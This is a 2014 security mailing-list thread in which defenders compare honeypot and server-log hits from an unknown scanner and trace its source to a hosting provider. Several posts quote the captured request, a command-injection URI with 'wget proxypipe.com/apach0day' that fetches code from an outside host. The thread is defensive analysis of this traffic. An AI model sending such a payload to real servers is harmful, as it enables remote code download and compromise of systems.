Nice find Robin! This hit each and everyone one of my honeypots. Same request. Really weird.
Here is what TShark shows me off one of my pcaps: ---- Node 0: 162.253.66.77:41790 Node 1: LOLHONEYPOT:80 139 GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; HTTP/1.0 User-agent: chroot-apach0day Referrer: /xA/x0a/x05 300 HTTP/1.1 200 OK Date: Mon, 28 Jul 2014 05:38:48 GMT Server: Apache/2.2.16 (Debian) Last-Modified: Wed, 22 May 2013 06:24:30 GMT ETag: "2e2f11-b1-4dd489e4be380" Accept-Ranges: bytes Content-Length: 177 Vary: Accept-Encoding Connection: close Content-Type: text/html <html><body><h1>It work 154 s!</h1> <p>This is the default web page for this server.</p> <p>The web server software is running but no content has been added, yet.</p> </body></html> ---- Our winner appears to be a shared hosting provider: 27176 | 162.253.66.0/24 | DATAWAGON | US | DATAWAGON.NET | DATAWAGON LLC On Mon, Jul 28, 2014 at 11:03 AM, xgermx <xge...@gmail.com> wrote: > Seeing hits from 16X.XXX.XX.X7 > Based on the name, I'd have to guess reflective DNS DDoS > Registrant phone for proxypipe.com is +1.8557769900 which actually works > and an IVR picks up :) I selected option 2 for tech support to complain > that the other kidz are laughing at my lame apache 0day but, my call was > shunted. > > xgermx > > > On Mon, Jul 28, 2014 at 10:30 AM, Frank Michael <frankcmich...@gmail.com> > wrote: > >> Various sources confirming the same thing for other sites. All on 7/28. >> Keep an eye open. >> >> On Jul 28, 2014, at 5:09 AM, Robin Wood <robin@digi.ninja> wrote: >> >> I've got a site that was scanned this morning by a tool that left these >> entries in the logs: >> >> [HTTP_USER_AGENT] => chroot-apach0day >> [HTTP_REFERRER] => /xA/x0a/x05 >> [REQUEST_URI] => /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget% >> 20proxypipe.com/apach0day; >> >> Anyone recognise it? That user agent isn't coming up in google searches. >> >> Robin >> >> _______________________________________________ >> >> Pauldotcom mailing list >> Pauldotcom@mail.securityweekly.com >> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom >> Main Web Site: http://pauldotcom.com >> >> >> _______________________________________________ >> Pauldotcom mailing list >> Pauldotcom@mail.securityweekly.com >> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom >> Main Web Site: http://pauldotcom.com >> > > > _______________________________________________ > Pauldotcom mailing list > Pauldotcom@mail.securityweekly.com > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > Main Web Site: http://pauldotcom.com > -- Ben Jackson - Mayhemic Labs b...@mayhemiclabs.com - http://www.mayhemiclabs.com - +1-508-296-0267 "Assume that what is in the power of one man to do, is in the power of another"
_______________________________________________ Pauldotcom mailing list Pauldotcom@mail.securityweekly.com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
